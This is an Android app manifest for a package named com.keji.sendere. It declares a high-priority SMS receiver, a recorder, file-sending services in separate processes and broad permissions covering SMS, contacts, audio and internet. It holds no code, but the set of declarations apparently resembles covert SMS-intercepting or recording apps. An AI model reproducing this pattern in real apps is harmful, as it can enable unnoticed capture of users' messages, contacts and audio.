<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.keji.sendere">
    <application android:icon="@drawable/iicon" android:label="@string/app_name" android:multiprocess="true">
        <activity android:label="@string/app_name" android:name=".Start">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name="sms.SMSreceiver">
            <intent-filter android:priority="100">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <activity android:name="FileView"/>
        <activity android:name="FileBrowse"/>
        <activity android:name="Recorder"/>
        <activity android:name="ReceiveCode"/>
        <activity android:name="FileReady"/>
        <service android:name="FileSender" android:process=":remote"/>
        <service android:name="FileReceive"/>
        <service android:name=".service.SysM" android:process=":three"/>
        <service android:name=".service.Mrun" android:process=":two"/>
        <receiver android:name=".service.ForAlarm" android:process=":remote"/>
    </application>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
</manifest>
